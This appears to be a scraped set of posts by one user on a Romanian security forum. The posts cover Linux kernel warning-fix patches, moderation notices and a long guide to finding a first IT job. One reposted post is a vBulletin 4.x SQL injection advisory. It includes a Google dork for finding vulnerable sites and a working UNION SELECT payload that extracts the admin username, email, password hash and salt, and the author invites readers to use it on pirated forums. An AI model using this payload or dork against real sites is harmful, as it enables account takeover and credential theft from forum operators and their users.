Nytro

A trecut ceva timp de cand nu am mai facut ceva util, dar azi cand am incercat sa imi compilez ultima versiune stabila de kernel, 3.0.1 am primit mai multe avertismente la compilare: drivers/edac/i82975x_edac.c: In function ‘i82975x_process_error_info’: drivers/edac/i82975x_edac.c:298: warning: integer constant is too large for ‘unsigned long’ type kernel/futex.c: In function ‘fixup_pi_state_owner’: kernel/futex.c:1549: warning: ‘curval’ may be used uninitialized in this function kernel/futex.c: In function ‘futex_lock_pi_atomic’: kernel/futex.c:678: warning: ‘curval’ may be used uninitialized in this function kernel/futex.c: In function ‘handle_futex_death’: kernel/futex.c:2454: warning: ‘nval’ may be used uninitialized in this function arch/x86/kernel/cpu/intel.c: In function ‘init_intel’: arch/x86/kernel/cpu/intel.c:469: warning: too many arguments for format drivers/scsi/lpfc/lpfc_debugfs.c: In function ‘T.1107’: drivers/scsi/lpfc/lpfc_debugfs.c:411: warning: the frame size of 1048 bytes is larger than 1024 bytes Cum aveam putin timp liber, am incercat sa ma fac util si sa fac niste patch-uri sa repar aceste probleme. i82975x_edac.c --- a/drivers/edac/i82975x_edac.c 2011-08-05 07:59:21.000000000 +0300 +++ b/drivers/edac/i82975x_edac.c 2011-08-07 15:11:33.292900211 +0300 @@ -278,7 +278,7 @@ static int i82975x_process_error_info(st struct i82975x_error_info *info, int handle_errors) { int row, multi_chan, chan; - unsigned long offst, page; + long long offst, page; multi_chan = mci->csrows[0].nr_channels - 1; @@ -295,7 +295,7 @@ static int i82975x_process_error_info(st page = (unsigned long) info->eap; if (info->xeap & 1) - page |= 0x100000000ul; + page |= 0x100000000ll; chan = page & 1; page >>= 1; offst = page & ((1 << PAGE_SHIFT) - 1); futex.c --- a/kernel/futex.c 2011-08-05 07:59:21.000000000 +0300 +++ b/kernel/futex.c 2011-08-07 14:45:26.117129011 +0300 @@ -675,7 +675,7 @@ static int futex_lock_pi_atomic(u32 __us struct task_struct *task, int set_waiters) { int lock_taken, ret, ownerdied = 0; - u32 uval, newval, curval, vpid = task_pid_vnr(task); + u32 uval, newval, uninitialized_var(curval), vpid = task_pid_vnr(task); retry: ret = lock_taken = 0; @@ -1546,7 +1546,7 @@ static int fixup_pi_state_owner(u32 __us u32 newtid = task_pid_vnr(newowner) | FUTEX_WAITERS; struct futex_pi_state *pi_state = q->pi_state; struct task_struct *oldowner = pi_state->owner; - u32 uval, curval, newval; + u32 uval, uninitialized_var(curval), newval; int ret; /* Owner died? */ @@ -2451,7 +2451,7 @@ err_unlock: */ int handle_futex_death(u32 __user *uaddr, struct task_struct *curr, int pi) { - u32 uval, nval, mval; + u32 uval, uninitialized_var(nval), mval; retry: if (get_user(uval, uaddr)) intel.c --- a/arch/x86/kernel/cpu/intel.c 2011-08-05 07:59:21.000000000 +0300 +++ b/arch/x86/kernel/cpu/intel.c 2011-08-07 14:58:03.532884828 +0300 @@ -466,7 +466,7 @@ static void __cpuinit init_intel(struct rdmsrl(MSR_IA32_ENERGY_PERF_BIAS, epb); if ((epb & 0xF) == 0) { - printk_once(KERN_WARNING, "x86: updated energy_perf_bias" + printk_once(KERN_WARNING "%s", "x86: updated energy_perf_bias" " to 'normal' from 'performance'\n" "You can view and update epb via utility," " such as x86_energy_perf_policy(8)\n"); lpfc_debugfs.c --- a/drivers/scsi/lpfc/lpfc_debugfs.c 2011-08-05 07:59:21.000000000 +0300 +++ b/drivers/scsi/lpfc/lpfc_debugfs.c 2011-08-07 15:45:48.007088993 +0300 @@ -378,7 +378,12 @@ lpfc_debugfs_dumpHBASlim_data(struct lpf int len = 0; int i, off; uint32_t *ptr; - char buffer[1024]; + char *buffer = kmalloc(1024, GFP_KERNEL); + + if(!buffer) { + printk(KERN_WARNING "lpfc_debugfs_dumpHBASlim_data: Unable to allocate memory\n"); + return -ENOMEM; + } off = 0; spin_lock_irq(&phba->hbalock); @@ -387,7 +392,7 @@ lpfc_debugfs_dumpHBASlim_data(struct lpf lpfc_memcpy_from_slim(buffer, phba->MBslimaddr + lpfc_debugfs_last_hba_slim_off, 1024); - ptr = (uint32_t *)&buffer[0]; + ptr = (uint32_t *)buffer; off = lpfc_debugfs_last_hba_slim_off; /* Set it up for the next time */ @@ -407,6 +412,7 @@ lpfc_debugfs_dumpHBASlim_data(struct lpf } spin_unlock_irq(&phba->hbalock); + kfree(buffer); return len; } Stiu ca sunt mult mai multe avertismente la compilare, dar nu am avut timp de mai mult. - La "i82975x_edac.c", se foloseste tipul "unsigned long" impreuna cu o constanta mai mare de 5 octeti. Cred ca depinde de sistem/compilator, dar cel putin la mine, sizeof(unsigned long) e 4, la fel si sizeof(unsigned long long) parca, dar sizeof(long long) este 8, destul pentru acea constanta si pentru acea variabila. - La "futex.c", sunt folosite 3 variabile, in 3 functii diferite, insa acele variabile sunt initializate intr-un "if" (transmise prin referinta intr-o functie), deci compilatorul nu poate sigur ca vor fi folosite initializate si afiseaza un avertisment. - La "intel.c", se foloseste incorect functia (de fapt macro-ul) printk_once. E la fel ca si printf, primul parametru e un sir in care se specifica formatul, sau un simplu sir de caractere, iar acolo nu e specificat formatul, care este necesar deoarece mai urmeaza un argument si se arunca un avertisment. - La "lpfc_debugfs.c" e ceva mai complicat, se depaseste marimea maxima a stack frame-ului, problema care se rezolva prin alocarea dinamica a buffer-ului. Am facut si o mica verificare, daca alocarea s-a efectuat cu succes. Daca voi avea timp, voi face mai multe...

Super, chiar zilele astea as fi avut (inca am) nevoie de asa ceva, o sa revin cu un rezultat. ++

Nu e rau dar: What's New? [ 08.17.2002 ] added compressor: UPX v1.21 for Dos added compressor: UPX v1.21 for Win added compressor: UPX v1.22 for Dos added compressor: UPX v1.22 for Win Modificare: Vad ca forumul e la zi.

Cine s-a pus la mintea lui si a injurat a primit warn. Asta ca sa se invete toata lumea minte si sa nu se mai injure cu prima ocazie. PS: Asta era cel care voia un limbaj civilizat aici.

Nu se vorbeste civilizat la offtopic si uneori la ShowOff, dar acolo apar avertismentele. Fa si tu un program de exemplu, posteaza, si o sa vezi ca nu o sa te injure nimeni ca la topicul cu "Vasile la Antena 1" sau cum era.

Thanks. Poate fi foarte util daca e putin gandit.

Data Management Business Intelligence Data Mining Data Modeling Data Warehousing Learn Concepts Application Development Client Server Cloud Computing Cluster Computing CRM Electronic Data Interchange ERP Neuro Linguistic Programming OOPS Concepts Programming Concepts Service Oriented Architecture Supply Chain Management Technology Trends UML Virtualization Web 2.0 Learn J2EE Java JSP Learn Microsoft Analysis Services ASP.NET ASP.NET 2.0 C# MS Project Training Silverlight SQL Server 2005 VB.NET 2005 Learn Networking Networking Wireless Learn Oracle Oracle 10g Training Oracle 11g PL/SQL Tutorials Oracle 11g Training Oracle 9i Training Oracle Apps 11i Learn Programming Ajax C Language C++ Tutorials CSS CSS3 JavaScript jQuery MainFrame PHP VBScript XML Software Testing Software Testing Types SQA Tutorials Testing Articles http://www.exforsys.com/

Gata, am facut ordine, nu mai are nimeni exagerat de multe puncte. http://rstcenter.com/forum/members/list/?order=DESC&sort=reputation&pp=30 Descrierile la diferite intervale nu sunt fixate, sunt doar cateva puse, "se balangane pe drum" e unul dintre ele. E o descriere pentru un anumit interval de puncte de reputatie, gen intre 50 si 100 de puncte.

Erau cativa cu multa reputatie, dar le-am scos-o eu. Cred ca se ia in considerare numarul de posturi si reputatia primita. Ba nu, mai sunt cativa cu multa reputatie, le scot eu

E cam simplu, nu necesita mai mult de 50 de linii de cod, deci mai mult de 10 minute de munca.

Sfatul meu, pentru cei care vor sa lucreze in domeniul IT: puteti face o facultate de informatica. O sa invatati multe chestii utile. Eu de exemplu aveam o materie LFA: Limbaje Formale si Automate. Era cu stari si alte porcarii si gandeam: "La ce imi trebuie mie rahaturile astea?" si nu am invatat nimic. Ma trezesc apoi la un interviu cu rahaturi de la materia asta... Exemplu de materii de info care se fac la mine la facultate: - algoritmi si structuri de date (foarte util) - algoritmica grafurilor (partial) - limbaje formale si automate (mai util decat pare) - arhitectura sistemelor de calcul (low level, va recomand) - programare procedurala (limbajul C in detaliu - practic) - programare orientata pe obiecte (nici nu se pune problema) Asta in primul an, se mai face: - sisteme de operare (linux, programare sub Linux) - retele de calculatoare (nu stiu cat de practic e) - programare logica (PL/SQL) - JSP (Java Servlet Pages - optional) - criptografie (nu are rost sa comentez) - inteligenta artificiala (posibil util) - baze de date (cred ca Oracle sau MSSQL) - dezvolare web (sau cam asa ceva, JavaScript si probabil si PHP) - tehnici de compilare (nu suna rau) - tehnici de optimizare (practic) Acum depinde de voi. Daca voi sunteti destepti, citi 2 tutoriale de PHP si gata, credeti ca sunteti tari si ca o sa luati 2000 de € pe luna ca programator PHP va inselati amarnic. La fel si cu C/C++, nu e de ajuns doar limbajul pe care oricum singuri sunt slabe sanse sa il invatati bine. De materiile de matematica, ideea e simpla: _|_ matematicii.

Da, nu prea are rost. Poate vor sa descarce un ebook, nu doar sa vada ce se afla la link-ul din topicul "Porno pe Youtube"... Si nu are rost sa ii obligam sa posteze.

Iti dau eu daca mai ai nevoie. Pot trai si fara 2 €...

ATM-ul nu e tocmai "Facultate". Facultate e aia la care poti sa lipsesti 2-3 saptamani si sa nu ii pese nimanui, nu chestia la care te trezeste la 7 dimineata si te pune sa alergi.

Clasic: 8 ore + 1 pauza de masa. De la 09:00 la 18:00. Sambata si duminica liber. Nu fac mare lucru. Chestia asta am postat-o pe blog, pentru prieteni mai mult, dar ma gandesc ca poate e utila si altora.

Câteva lucruri de luat în considerare de cei care vor s? se angajeze în domeniul IT, în alte domenii nu ?tiu cum stau lucrurile, dar în IT poate fi foarte u?or. M-am angajat ?i eu de curând ?i am înv??at câteva lucruri importante, lucruri care pot fi foarte utile celor care vor s? se angajeze în domeniul IT. Care s? fie cel mai bun moment în care s? te angajezi? Asta depinde de fiecare în parte. M? voi adresa în special celor ca ?i mine, studen?i (la informatic?) care vor s? devin? independen?i. Înainte de a v? angaja trebuie s? v? pune?i mai multe întreb?ri: - îmi ajung banii pe care mi-i ofer? parin?ii? - o s? m? mai pot distra dac? voi lucra? - voi putea s? m? ?in de ?coal? dac? m? angajez? - cum se va schimba via?a mea pe viitor? ?i probabil multe altele. Nu lua?i asta în glum?. De aceste alegeri ?i de cum r?spunde?i la acele întreb?ri depinde via?a voastr?. Ca s? v? r?spund eu la întreb?ri: da, v? ajung banii de la p?rin?i, dar vre?i mai mul?i ?i nu mai vre?i s? depinde?i de p?rin?i. Da, o s? ave?i timp ?i de distrac?ie, nu cred c? v? distra?i la 13:00, la ora aceasta dormi?i, dac? e s? face?i ceva interesant face?i seara/noaptea. Cu ?coala probabil vor ap?rea probleme, dar dac? nu vre?i s? ave?i numai 10 pe linie ?i nu v? pasioneaz? mersul la facultate, nu ve?i avea probleme. Examenele se pot lua înv??ând o noapte (cazul meu, ce-i drept cu 5 ?i nu toate). Via?a se va schimba, dar nu foarte drastic. Vei avea mai pu?in timp liber, dar o s? îl po?i valorifica mai frumos. Câteva idei de urm?rit: nu e bine s? v? angaja?i din primul an, mai ales dac? a?i venit din alt ora?, nu e recomandat s? cere?i miliarde ca salariu, nu o s? v? dea nimeni: nu ave?i experien?? ?i alege?i un loc de munc? unde chiar v-ar pl?cea s? lucra?i, pe cât posibil, nu doar s? o face?i pentru bani. Dac? v? descurca?i cu banii ?i dac? vre?i s? mai a?tepta?i pân? s? ‘prinde?i experien??’, sincer, nu v? recomand s? v? angaja?i. Ve?i lucra toat? via?a, o s? v? s?tura?i, tr?i?i-v? via?a, sta?i lini?ti?i acas?, f?r? griji. ?i asculta?i de p?rin?i ?i de prieteni, lua?i în considerare ceea ce spun îns? gândi?i, doar voi ?ti?i ce e cel mai bine pentru voi (destul de des nu e a?a). L?sând no?iunile morale, s? trecem la lucruri practice ?i aici probabil cel mai important lucru e CV-ul. În primul rând trebuie s? fie ordonat, nu s? împr??tia?i date prin el ?i s? nu se în?eleag? nimic. Apoi, trebuie s? specifica?i orice crede?i c? ar putea fi util, ca un angajator ar vedea cu ochi buni. De asemenea, poza de pe CV ar fi de preferat s? fie una decent?, eu am mers la un interviu cu un CV cu o poz? mai nepotrivit? ?i persoana cu care discutam, având CV-ul meu în fa??, a t?iat poza cu pixul ?i a specificat c? aceea nu e poz? de CV. Ulterior, am înlocuit-o cu una mai elegant?, în costum. De asemenea, conteaz? ?i adresa de mail, nu o s? fie mul?umi?i daca vor vedea “vasile_bagabontu@yahoo.com”. Ar fi de preferat s? face?i un mail separat pentru CV, “nume_prenume_ceva@gmail.com” de exemplu, mie mi s-a atras aten?ia ?i asupra mail-ului. Dar ce con?ine CV-ul? Eh, aici e problema. Problema e c? nu con?ine mai nimic. De aceea sfatul meu pentru cei care sunt la liceu e s? fac? cât mai multe lucruri care ar putea fi trecute în CV, orice proiect, cât de mic, conteaz? foarte mult. Acest lucru e valabil mai ales pentru persoanele care “?tiu” programare. Sunt foarte mul?i care sunt de aceast? p?rere, dar angajatorii nu vor fi dac? nu vor vedea un proiect. Ai înv??at C/C++, PHP sau orice altceva în liceu? Pune în practic?. La fel, dac? e?ti la facultate, po?i g?si pu?in timp s? faci un proiect, nu pierde timpul degeaba. Sunt mai multe lucruri care ar trebui trecute în CV-ul unui viitor IT-ist. pute?i trece postul urm?rit (Full time, Part time, Project based, Internship) ?i salariul dorit. Aten?ie ce valoare îi atribui?i aici variabilei, dac? vor vedea 2000€ nu vor citi mai departe. Trece?i apoi cuno?tin?ele voastre, ceea ce ?ti?i, proiecte ?i orice altceva tehnic ce ar putea fi util. De asemenea trece?i ?i lucruri mai pu?in tehnice ca “m? adaptez u?or”, “înv?? repede lucruri noi”… ?i a?tepta?i-v? ?i la întreb?ri legate de aceste lucruri. Bun, v-a?i f?cut CV-ul ?i vre?i s? trece?i la treab?. Cel mai simplu ?i mai practic, v? face?i conturi pe bestjobs, ejobs. Dar degeaba v? face?i cont acolo dac? nu aplica?i la oferte. Se caut? ?i CV-uri, dar slabe ?anse s? fie g?site ale voastre. Selecta?i domeniile urm?rite ?i vede?i la fiecare slujb? ce se cere. Dac? e?ti sigur c? te descurci po?i aplica, dac? nu, nu are rost. ?i aplic? la cât mai multe. De multe ori nici nu se uit? pe CV, v?d c? nu ave?i experien??, c? nu a?i mai lucrat ?i trec mai departe. În plus, multe firme o s? vad? CV-ul dar nu o s? v? cheme la interviu deoarece aplic? multe persoane ?i probabil multe dintre ele sunt mai preg?tite. Aplica?i la cel pu?in 20-30, ave?i de unde alege, sunt multe locuri în domeniu. Selecta?i în special posturile pentru “Junior”. Avem avantajul c? în domeniul nostru (IT, Software, calculatoare) exist? astfel de posturi special adresate celor f?r? experien?? ?i aici avem cele mai multe ?anse. Desigur, salariile nu sunt exagerat de mari, e mai greu la început, dar trebuie s? trecem ?i prin asta. De asemenea mai exist? ?i internship-uri care pot fi foarte utile ?i se pot înv??a multe lucruri. În fine, am f?cut CV-ul, am aplicat la mai multe locuri ?i ne cheam? la interviu. La primul interviu nu trebuie s? fi?i speria?i sau emo?iona?i. De cele mai multe ori ve?i vorbi cu persoane tinere ?i vesele. O s? v? plac? la interviuri, cel pu?in la primele. Conteaz? mult impresia pe care o face?i, sugestia mea e s? fi?i voi în?iv?. Pe lâng? întreb?rile despre voi, de cele mai multe ori ve?i da teste tehnice, care nu sunt simple. ?i acum se vede ceea ce ?ti?i. Eu înc? de la primul interviu mi-am dat seama c? ?tiu foarte pu?ine. De exemplu, dac? aplica?i pentru un post de programator PHP a?tepta?i-v? la întreb?ri ca: - care e diferen?a dintre <<<CEVA ?i <<<’CEVA’ (heredoc ?i newdoc)? - ce e o clas? abstract?, ce e o interfa?? ?i care sunt diferen?ele dintre ele? - cum se serializeaz? un obiect? - ce fac ?i cum se folosesc __invoke, __string? - ce face ?i când se folose?te cuvântul cheie ‘static’? - care e durat? de via?? a unui cookie pentru care nu se specific? aceasta? - scrie un query cu JOIN-uri care leag? 3 tabele (ca idee – MySQL) - ce sunt ?i cu ce ajut? procedurile preg?tite (prepared queries – MySQL) - pe ce coloane ar trebui pu?i indec?i în baza de date pentru c?ut?ri rapide (MySQL)? Dac? nu ?tii s? r?spunzi la aceste întreb?ri nu ?tii PHP ?i MySQL ?i ar trebui s? mai înve?i. Cam în aceast? situa?ie am fost ?i eu. De asemenea, e posibil s? nu lipseasc? intreb?ri despre mod_rewrite, jQuery/JavaScript, Linux, poate chiar ?i extensii PHP ca sockets. De asemenea ar fi foarte util s? cunoa?te?i cel pu?in un Framework PHP ca Zend, CakePHP, CodeIgniter sau Symphony. Legat de MySQL a?i putea s? înv??a?i ?i partea de administrare ?i câte ceva despre motoarele de stocare. Dac? aplica?i pentru un post de programator C/C++: - cum se supraîncarc? un operator? - acces la date mo?tenite ca private/public/protected… - ce este o func?ie virtual? ?i la ce folose?te? - care-i treaba cu un destructor virtual? - ce este ‘placement new’? (informativ) - cum apelezi o func?ie dintr-un vector de pointeri la func?ii? - scrie un cod care s? inverseze o list? simplu înl?n?uit? - scrie cod care s? genreze numere aleatoare, scriere în fi?iere… În fine, vor fi multe întreb?ri legate de limbaj în sine ?i de algoritmic?. Probabil nu ce am întrebat eu, dar lucruri asem?n?toare. Dar aici stau altfel lucrurile, nu ca la PHP. Aici nu e de ajuns s? cuno?ti doar limbajul, îns? alte lucruri cu care vei lucra la firm? le vei înv??a ulterior. Ai putea s? înve?i cate ceva despre Windows API, multithreading sau ce ?i s-ar p?rea mai util. Aici totul depinde de firma la care mergi la interviu, cu ce se ocup?. Pot de exemplu scrie module de kernel ?i în acest caz nu e de ajuns s? ?tii doar limbajul. La firma la care lucrez eu au fost ?i întreb?ri ca: - modalit??i de comunicare inter-procese (IPC – Inter Process Communication) - care sunt avantajele ?i dezavantajele protocolului UDP fa?? de TCP? - enumer? nivelurile modelului OSI - la ce se folosesc ?i exemple pentru ‘sed’ ?i ‘awk’ Nici pentru un post de ‘Administrator Linux’ nu e deloc u?or. Nu o s? trebuiasc? s? ?tii ce face ‘ls’, va trebui s? ?tii multe, în principal shell scripting ?i foarte multe despre Linux ?i configurare, lucruri pe care nu le vei înv??a din GUI-urile de la Ubuntu. Po?i încerca de exemplu s? compilezi un kernel sau s? instalezi programe din sursa, s? faci totul de la dezarhivare la instalare în linia de comand?. De asemenea, Administrator Linux nu înseamn? s? scrii dou? comenzi în terminal ?i gata, de securitate, permisiuni fi?iere ?i toate cele nu se pune problema. Trebuie s? stai bine ?i la capitolul re?ele. S? ?tii cel pu?in ce e TCP/IP/UDP ?i ce structur? au, câte ceva despre DNS ?i protocoale de nivel aplica?ie: HTTP, FTP… De asemenea nu ar strica s? cuno?ti ?i ni?te protocoale de routare. Cam la astfel de interviuri am fost ?i cam astfel de date v? pot oferi. Ideea de baz? e c? nu e u?or deloc ?i ve?i descoperi repede c? nu ?ti?i foarte multe lucruri ?i ca sunt multe lucruri pe care trebuie s? le înv??a?i. Pe lâng? partea tehnic?, v? vor întreba ?i de salariu. Nu v? a?tepta?i la miliarde, cine ?i pentru ce v-ar da mai mult de 20 de milioane? Voi a?i da cuiva care nu are experien??, care nu a mai lucrat ?i care ?tie doar limbajul cu care va lucra mai mult de 20 de milioane? Nu prea cred. Cere?i cam 300-400 maxim 500 de euro. Dac? ve?i specifica în CV c? vre?i 500 de euro sunt ?anse foarte slabe s? fi?i contactat, nu vor fi multe firme disponibile s? v? ofere astfel de sume. Cere?i cam 400 de euro, eu cred c? e bine pentru început. Apoi, totul depinde de firm?: ce fel de contrat, cât de strict, ce ai voie ?i ce nu ai voie s? faci la munc?, cum merg lucrurile, ce face firma ?i ce vei face tu la firm?… Cam asta v? pot spune eu, sper s? g?si?i informa?ii utile care s? v? ajute. Baft?!

Imi place cum e strcturata si aranjata. Thanks.

Asa ma gandeam si eu, inca un "boss" ai Internet-ului. Imi pare rau, am febra musculara si nu pot sa ma pun in genunchi inaintea ta. Ban, nu e permanent, poate iti schimbi si tu mentalitatea.

1) Pui prea multe emoticoane 2) Faci "idiot" pe oricine iti spune ceva 3) Ai aere dar nu poti dovedi nimic legat de milw0rm Inca un post ca cele de mai sus si ai ban.

"linux cmd", "sa invete keylogging", "sa se protejeze cu servere proxy" Da, ce pot sa spun, bun venit...

Inca un topic care cere o cultura vasta in industria tehnologiei informatice pentru a putea fi inteles. Stiu, pe baza unui astfel de subiect solid se poate discuta mult, pot sa apara divergente de etica si mentalitate ceea ce ar duce la confilcte morale puternice intre membri. Se poate discuta psihologia personajului, ii se poate face un portret psihologic si se poate face o lista cu critici constructive. De exemplu, poate fi luat ca exemplu, unii membri isi pot crea un ideal in viata din acest personaj. E posibil ca totul sa fie o masca, ca acea persoana sa aiba mai multe identitati. In fine, se pot discuta multe. Dar inchid totusi acest subiect, nu vreau sa va obositi materia cenusie cu subiecte culturale atat de complexe.

Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day # Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day # Google Dork: intitle: powered by Vbulletin 4 # Date: 20/07/2011 # Author: FB1H2S # Software Link: [[url]http://www.vbulletin.com/][/url] # Version: [4.x.x] # Tested on: [relevant os] # CVE : [[url=http://members.vbulletin.com/]]Please Log In[/url] ###################################################################################################### Vulnerability: ###################################################################################################### Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation. ##################################################################################################### Vulnerable Code: ##################################################################################################### File: /vbforum/search/type/socialgroupmessage.php Line No: 388 Paramater : messagegroupid if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0) { $value = $registry->GPC['messagegroupid']; if (!is_array($value)) { $value = array($value); } if (!(in_array(' ',$value) OR in_array('',$value))) { if ($rst = $vbulletin->db->query_read(" SELECT socialgroup.name FROM " . TABLE_PREFIX."socialgroup AS socialgroup ---> WHERE socialgroup.groupid IN (" . implode(', ', $value) .")") } ############################################################################################ Exploitation: ############################################################################################ Post data on: -->search.php?search_type=1 --> Search Single Content Type Keywords : Valid Group Message Search Type : Group Messages Search in Group : Valid Group Id &messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1# ########################################################################################## More Details: ########################################################################################## [url]Http://www.Garage4Hackers.com[/url] [url=http://www.garage4hackers.com/showthread.php?1177-Vbulletin-4.0.x-gt-4.1.3-(messagegroupid)-SQL-injection-Vulnerability-0-day]Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day[/url] ########################################################################################### Note: ########################################################################################### Funny part was that, a similar bug was found in the same module, search query two months back. Any way Vbulletin has released a patch as it was reported to them by altex, hence customers are safe except those lowsy Admins. And this bug is for people to play with the many Nulled VB sites out there. " Say No to Piracy Disclosure ". Sursa: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day

Membrii urmatori au primit VIP: - Xander - wildchild

Nu se merita o categorie pentru asa ceva, poate un topic special.

Si tu? Ce aveti ma? Si eu lucrez, dar si de aici de la munca, ma plictisesc si intru pe aici. ------------ From nobody: Nu toti avem acelasi job sa putem judeca la modul general.